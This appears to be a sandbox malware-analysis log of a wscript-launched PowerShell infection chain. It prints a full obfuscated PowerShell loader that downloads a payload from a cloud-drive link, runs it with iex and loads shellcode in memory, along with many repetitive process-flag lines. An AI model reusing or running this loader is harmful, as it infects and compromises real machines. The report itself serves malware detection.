CacPDepuoPrydwForfeLignrGrsgSSocihErotefisklPastlMemo\KnstvDete1Famo. Bal0 Tim\Backpdatio pegw Seme BikrRheasLobehBanke Skalsolal Sna.BenzeGavsxGrapeCarn ';. ($Skotskterr01) (Propje9 'Bran$SymfRMusiaVoldtCigaiParto MooeMakur UdvaFearvPolai Gra2Supe=Inte$Lavre GngnSippv Gad:Coppw Afsi GednDyredHegliIngerUdet ') ; . ($Skotskterr01) (Propje9 'Bort$ FabHOveroIdeam MoneGummmrung1 Tre6Merp3Apop=mold$GaelRApopaGrantLovriIdyloEkvieAalerSupra BeavSupeiTamp2Cadd+Godt$SemoHBurso CysmMulteAktemMess1 For6Zine3Gobb ') ; . ($Skotskterr01) (Propje9 'Hage$MonoHRedaeFeritAeroeAnterSadeoClampCand Rede=Bour Komm(Dame(TolegPrsiw Flnm ScaiPrin Multw EksiHeatnTeat3Cloi2Narr_SkylpAnatrQuaroCompcDanieFuglsMordsNonv Rei-AuktFTsem PrecPDruirfyrsoSpydcCryoePaabsIcons GloI IdrdOuts=Mist$Tyra{KhouPTranIStilDSjak}Phal)form. OxiCRomao KlimGesvm Nona TronSelvdWedlL UnciWintnDybkeGulc) Nar Ker-insesFidup Hvil Radi QuatLaqu Unnu[Sukkc ModhLafgaSpoorEndu]Flyv3Klav4Deat '); & ($Skotskterr01) (Propje9 'Deaf$ DrmSUnada colmNatsm fese ThanFisc Kol=Ence Tids$MongHViateCoevtRedeeDatar SkroCentp Sys[cons$DigtH Pine NevtSuppeStjerJocaoprimp Unc.AliecAntio TypufirenAndetSkar- Vet2Beas]Wond '); & ($Skotskterr01) (Propje9 ' Alk$meloD Mina SubtUnedaSkva= Far(OverTGlyceGrensBudgt Pre-UnpePChimaPaattCraihEnhe Wan$vaerHHaanoDestmDiatePetnmNske1Fase6Trac3Mech) Enc Unop-LavkAMarknNoncd Ant Unpu(Kiss[ AfpIBactnPunktNbetPStiltHelprBear]Bank:Unin: DklsPartiEmpizMuree Sun Ele-runeeSkryq Fly Rive8 Ver)Bava ') ;if ($Data) {.$Homem163 $Sammen;} else {;$Skotskterr00=Propje9 'RuskSCarbtStilaStaarCoddtAkti-PitiBskatiDalgtRisosCaprTTyngroracaElfen VinsLawnfKlkeeKalirMali Ang- CatS TwioRecouFiltrovalcRenmeGoos Cerv$DeclAArtib Speo ClenSystnHallePancm Yace VognUnse Laes- LarD Fame BetsJavat TmriLkkenDagcaKinitAnveiFolioDundnstad Repu$ DisR Sena StatAarsiArtfoSteneVincrPrecaHejev HomiMeli2Have '; .($Skotskterr01) (Propje9 'Sang$tranRMewlaOxydtReceiSagsoHushe Pror Jeka ColvhvisiRapp2Afgr=Stri$HarzeDobbnUdvivposi:SkanaLnpapPyelpElvrdKammaSergtCatdaHyri ') ; &
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" " function Propje9 ([String]$Hjsp){$Avancereno=5;For($Genne=4; $Genne -lt $Hjsp.Length-1; $Genne+=$Avancereno){$Mdeaftner=$Hjsp.Substring( $Genne, 1);$Skotskterr+=$Mdeaftner};$Skotskterr;}$Abonnemen=Propje9 'AntehEnsit BegtMonopBucksTryn:Admi/ For/IndudNonurRekiiAfstvLcsyeSubo.lattgSmitoDigeoDiscgDatalHarpe fug. CoccIssuoEpicmPoly/ intutowecLong?diureTranx TyppPampointer PhitFutu=SymfdKasboBerawBundnWarll EntoCommaNonsdGtes&JuniiOmnidGrns=Unfr1UdvadBenzsSamm7FremuskrnXLoosoSpdbiDemoivargNCuspl FsfQElecLMathUEfteVcullaRufiO Hal6ForskKirigfrer1squa9StifnAlimcNumifBagff Rhiq Refe Gge2 Resg FlaoUncamKore0Giga ';$Skotskterr01=Propje9 'Prini SpyeUnquxSurp ';$Homem163 = Propje9 'Atte\Makrs Apiy OvesPrepwagreoAuthwKitt6Forb4Nond\NonbWRushiWaganUnded Svio SauwDrags CacPDepuoPrydwForfeLignrGrsgSSocihErotefisklPastlMemo\KnstvDete1Famo. Bal0 Tim\Backpdatio pegw Seme BikrRheasLobehBanke Skalsolal Sna.BenzeGavsxGrapeCarn ';. ($Skotskterr01) (Propje9 'Bran$SymfRMusiaVoldtCigaiParto MooeMakur UdvaFearvPolai Gra2Supe=Inte$Lavre GngnSippv Gad:Coppw Afsi GednDyredHegliIngerUdet ') ; . ($Skotskterr01) (Propje9 'Bort$ FabHOveroIdeam MoneGummmrung1 Tre6Merp3Apop=mold$GaelRApopaGrantLovriIdyloEkvieAalerSupra BeavSupeiTamp2Cadd+Godt$SemoHBurso CysmMulteAktemMess1 For6Zine3Gobb ') ; . ($Skotskterr01) (Propje9 'Hage$MonoHRedaeFeritAeroeAnterSadeoClampCand Rede=Bour Komm(Dame(TolegPrsiw Flnm ScaiPrin Multw EksiHeatnTeat3Cloi2Narr_SkylpAnatrQuaroCompcDanieFuglsMordsNonv Rei-AuktFTsem PrecPDruirfyrsoSpydcCryoePaabsIcons GloI IdrdOuts=Mist$Tyra{KhouPTranIStilDSjak}Phal)form. OxiCRomao KlimGesvm Nona TronSelvdWedlL UnciWintnDybkeGulc) Nar Ker-insesFidup Hvil Radi QuatLaqu Unnu[Sukkc ModhLafgaSpoorEndu]Flyv3Klav4Deat '); & ($Skotskterr01) (Propje9 'Deaf$ DrmSUnada colmNatsm fese ThanFisc Kol=Ence Tids$MongHViateCoevtRedeeDatar SkroCentp Sys[cons$DigtH Pine NevtSuppeStjerJocaoprimp Unc.AliecAntio TypufirenAndetSkar- Vet2Beas]Wond '); & ($Skotskterr01) (Propje9 ' Alk$meloD Mina SubtUnedaSkva= Far(OverTGlyceGrensBudgt Pre-UnpePChimaPaattCraihEnhe Wan$vaerHHaanoDestmDiatePetnmNske1Fase6Trac3Mech) Enc Unop-LavkAMarknNoncd Ant Unpu(Kiss[ AfpIBactnPunktNbetPStiltHelprBear]Bank:Unin: DklsPartiEmpizMuree Sun Ele-runeeSkryq Fly Rive8 Ver)Bava ') ;if ($Data) {.$Homem163 $Sammen;} else {;$Skotskterr00=Propje9 'RuskSCarbtStilaStaarCoddtAkti-PitiBskatiDalgtRisosCaprTTyngroracaElfen VinsLawnfKlkeeKalirMali Ang- CatS TwioRecouFiltrovalcRenmeGoos Cerv$DeclAArtib Speo ClenSystnHallePancm Yace VognUnse Laes- LarD Fame BetsJavat TmriLkkenDagcaKinitAnveiFolioDundnstad Repu$ DisR Sena StatAarsiArtfoSteneVincrPrecaHejev HomiMeli2Have '; .($Skotskterr01) (Propje9 'Sang$tranRMewlaOxydtReceiSagsoHushe Pror Jeka ColvhvisiRapp2Afgr=Stri$HarzeDobbnUdvivposi:SkanaLnpapPyelpElvrdKammaSergtCatdaHyri ') ; &
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " function Propje9 ([String]$Hjsp){$Avancereno=5;For($Genne=4; $Genne -lt $Hjsp.Length-1; $Genne+=$Avancereno){$Mdeaftner=$Hjsp.Substring( $Genne, 1);$Skotskterr+=$Mdeaftner};$Skotskterr;}$Abonnemen=Propje9 'AntehEnsit BegtMonopBucksTryn:Admi/ For/IndudNonurRekiiAfstvLcsyeSubo.lattgSmitoDigeoDiscgDatalHarpe fug. CoccIssuoEpicmPoly/ intutowecLong?diureTranx TyppPampointer PhitFutu=SymfdKasboBerawBundnWarll EntoCommaNonsdGtes&JuniiOmnidGrns=Unfr1UdvadBenzsSamm7FremuskrnXLoosoSpdbiDemoivargNCuspl FsfQElecLMathUEfteVcullaRufiO Hal6ForskKirigfrer1squa9StifnAlimcNumifBagff Rhiq Refe Gge2 Resg FlaoUncamKore0Giga ';$Skotskterr01=Propje9 'Prini SpyeUnquxSurp ';$Homem163 = Propje9 'Atte\Makrs Apiy OvesPrepwagreoAuthwKitt6Forb4Nond\NonbWRushiWaganUnded Svio SauwDrags CacPDepuoPrydwForfeLignrGrsgSSocihErotefisklPastlMemo\KnstvDete1Famo. Bal0 Tim\Backpdatio pegw Seme BikrRheasLobehBanke Skalsolal Sna.BenzeGavsxGrapeCarn ';. ($Skotskterr01) (Propje9 'Bran$SymfRMusiaVoldtCigaiParto MooeMakur UdvaFearvPolai Gra2Supe=Inte$Lavre GngnSippv Gad:Coppw Afsi GednDyredHegliIngerUdet ') ; . ($Skotskterr01) (Propje9 'Bort$ FabHOveroIdeam MoneGummmrung1 Tre6Merp3Apop=mold$GaelRApopaGrantLovriIdyloEkvieAalerSupra BeavSupeiTamp2Cadd+Godt$SemoHBurso CysmMulteAktemMess1 For6Zine3Gobb ') ; . ($Skotskterr01) (Propje9 'Hage$MonoHRedaeFeritAeroeAnterSadeoClampCand Rede=Bour Komm(Dame(TolegPrsiw Flnm ScaiPrin Multw EksiHeatnTeat3Cloi2Narr_SkylpAnatrQuaroCompcDanieFuglsMordsNonv Rei-AuktFTsem PrecPDruirfyrsoSpydcCryoePaabsIcons GloI IdrdOuts=Mist$Tyra{KhouPTranIStilDSjak}Phal)form. OxiCRomao KlimGesvm Nona TronSelvdWedlL UnciWintnDybkeGulc) Nar Ker-insesFidup Hvil Radi QuatLaqu Unnu[Sukkc ModhLafgaSpoorEndu]Flyv3Klav4Deat '); & ($Skotskterr01) (Propje9 'Deaf$ DrmSUnada colmNatsm fese ThanFisc Kol=Ence Tids$MongHViateCoevtRedeeDatar SkroCentp Sys[cons$DigtH Pine NevtSuppeStjerJocaoprimp Unc.AliecAntio TypufirenAndetSkar- Vet2Beas]Wond '); & ($Skotskterr01) (Propje9 ' Alk$meloD Mina SubtUnedaSkva= Far(OverTGlyceGrensBudgt Pre-UnpePChimaPaattCraihEnhe Wan$vaerHHaanoDestmDiatePetnmNske1Fase6Trac3Mech) Enc Unop-LavkAMarknNoncd Ant Unpu(Kiss[ AfpIBactnPunktNbetPStiltHelprBear]Bank:Unin: DklsPartiEmpizMuree Sun Ele-runeeSkryq Fly Rive8 Ver)Bava ') ;if ($Data) {.$Homem163 $Sammen;} else {;$Skotskterr00=Propje9 'RuskSCarbtStilaStaarCoddtAkti-PitiBskatiDalgtRisosCaprTTyngroracaElfen VinsLawnfKlkeeKalirMali Ang- CatS TwioRecouFiltrovalcRenmeGoos Cerv$DeclAArtib Speo ClenSystnHallePancm Yace VognUnse Laes- LarD Fame BetsJavat TmriLkkenDagcaKinitAnveiFolioDundnstad Repu$ DisR Sena StatAarsiArtfoSteneVincrPrecaHejev HomiMeli2Have '; .($Skotskterr01) (Propje9 'Sang$tranRMewlaOxydtReceiSagsoHushe Pror Jeka ColvhvisiRapp2Afgr=Stri$HarzeDobbnUdvivposi:SkanaLnpapPyelpElvrdKammaSergtCatdaHyri ') ; & Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" " function Propje9 ([String]$Hjsp){$Avancereno=5;For($Genne=4; $Genne -lt $Hjsp.Length-1; $Genne+=$Avancereno){$Mdeaftner=$Hjsp.Substring( $Genne, 1);$Skotskterr+=$Mdeaftner};$Skotskterr;}$Abonnemen=Propje9 'AntehEnsit BegtMonopBucksTryn:Admi/ For/IndudNonurRekiiAfstvLcsyeSubo.lattgSmitoDigeoDiscgDatalHarpe fug. CoccIssuoEpicmPoly/ intutowecLong?diureTranx TyppPampointer PhitFutu=SymfdKasboBerawBundnWarll EntoCommaNonsdGtes&JuniiOmnidGrns=Unfr1UdvadBenzsSamm7FremuskrnXLoosoSpdbiDemoivargNCuspl FsfQElecLMathUEfteVcullaRufiO Hal6ForskKirigfrer1squa9StifnAlimcNumifBagff Rhiq Refe Gge2 Resg FlaoUncamKore0Giga ';$Skotskterr01=Propje9 'Prini SpyeUnquxSurp ';$Homem163 = Propje9 'Atte\Makrs Apiy OvesPrepwagreoAuthwKitt6Forb4Nond\NonbWRushiWaganUnded Svio SauwDrags CacPDepuoPrydwForfeLignrGrsgSSocihErotefisklPastlMemo\KnstvDete1Famo. Bal0 Tim\Backpdatio pegw Seme BikrRheasLobehBanke Skalsolal Sna.BenzeGavsxGrapeCarn ';. ($Skotskterr01) (Propje9 'Bran$SymfRMusiaVoldtCigaiParto MooeMakur UdvaFearvPolai Gra2Supe=Inte$Lavre GngnSippv Gad:Coppw Afsi GednDyredHegliIngerUdet ') ; . ($Skotskterr01) (Propje9 'Bort$ FabHOveroIdeam MoneGummmrung1 Tre6Merp3Apop=mold$GaelRApopaGrantLovriIdyloEkvieAalerSupra BeavSupeiTamp2Cadd+Godt$SemoHBurso CysmMulteAktemMess1 For6Zine3Gobb ') ; . ($Skotskterr01) (Propje9 'Hage$MonoHRedaeFeritAeroeAnterSadeoClampCand Rede=Bour Komm(Dame(TolegPrsiw Flnm ScaiPrin Multw EksiHeatnTeat3Cloi2Narr_SkylpAnatrQuaroCompcDanieFuglsMordsNonv Rei-AuktFTsem PrecPDruirfyrsoSpydcCryoePaabsIcons GloI IdrdOuts=Mist$Tyra{KhouPTranIStilDSjak}Phal)form. OxiCRomao KlimGesvm Nona TronSelvdWedlL UnciWintnDybkeGulc) Nar Ker-insesFidup Hvil Radi QuatLaqu Unnu[Sukkc ModhLafgaSpoorEndu]Flyv3Klav4Deat '); & ($Skotskterr01) (Propje9 'Deaf$ DrmSUnada colmNatsm fese ThanFisc Kol=Ence Tids$MongHViateCoevtRedeeDatar SkroCentp Sys[cons$DigtH Pine NevtSuppeStjerJocaoprimp Unc.AliecAntio TypufirenAndetSkar- Vet2Beas]Wond '); & ($Skotskterr01) (Propje9 ' Alk$meloD Mina SubtUnedaSkva= Far(OverTGlyceGrensBudgt Pre-UnpePChimaPaattCraihEnhe Wan$vaerHHaanoDestmDiatePetnmNske1Fase6Trac3Mech) Enc Unop-LavkAMarknNoncd Ant Unpu(Kiss[ AfpIBactnPunktNbetPStiltHelprBear]Bank:Unin: DklsPartiEmpizMuree Sun Ele-runeeSkryq Fly Rive8 Ver)Bava ') ;if ($Data) {.$Homem163 $Sammen;} else {;$Skotskterr00=Propje9 'RuskSCarbtStilaStaarCoddtAkti-PitiBskatiDalgtRisosCaprTTyngroracaElfen VinsLawnfKlkeeKalirMali Ang- CatS TwioRecouFiltrovalcRenmeGoos Cerv$DeclAArtib Speo ClenSystnHallePancm Yace VognUnse Laes- LarD Fame BetsJavat TmriLkkenDagcaKinitAnveiFolioDundnstad Repu$ DisR Sena StatAarsiArtfoSteneVincrPrecaHejev HomiMeli2Have '; .($Skotskterr01) (Propje9 'Sang$tranRMewlaOxydtReceiSagsoHushe Pror Jeka ColvhvisiRapp2Afgr=Stri$HarzeDobbnUdvivposi:SkanaLnpapPyelpElvrdKammaSergtCatdaHyri ') ; & Jump to behavior
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Unseriali05 $Tack $Unseriali00), (Unseriali04 @([IntPtr], [UInt32]) ([IntPtr])))$sldni = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCa
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Clayi8)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Clayi9, $false).DefineType($Jackan460, $Jackan461,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Propje)$Skotskterr2 = [System.Text.Encoding]::ASCII.GetString($Boldspi)$Amor=$Skotskterr2.substring(256311,28430)<#Sealant Strygeo Adepterne Polycye #><#Sydye Photomtun Horselyga #><
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFE7DE500BD pushad ; iretd 2_2_00007FFE7DE500C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFE7DE55705 push eax; iretd 2_2_00007FFE7DE55709
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04A82852 pushfd ; iretd 4_2_04A82861
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04A836D9 push ebx; iretd 4_2_04A836DA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_093E252D push 16586B13h; ret 4_2_093E25A9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_093E297D push esi; retf 4_2_093E2980
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_093E25AA push 16586B13h; ret 4_2_093E25A9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_093E119D push edi; ret 4_2_093E117B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_093E2C7A push FBB24A38h; ret 4_2_093E2CA5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_093E0860 pushfd ; ret 4_2_093E086E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_093E28A2 push CF925E9Eh; iretd 4_2_093E28A8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_093E00F4 push cs; iretd 4_2_093E00F5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_093E24D6 push 16586B13h; ret 4_2_093E25A9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_093E4FA0 push esp; retf 4_2_093E4FB2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_093E1A69 push ecx; retf 4_2_093E1A6C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_093E12BF push eax; iretd 4_2_093E12C6
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_093E62E3 push ss; retf 4_2_093E62F2
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
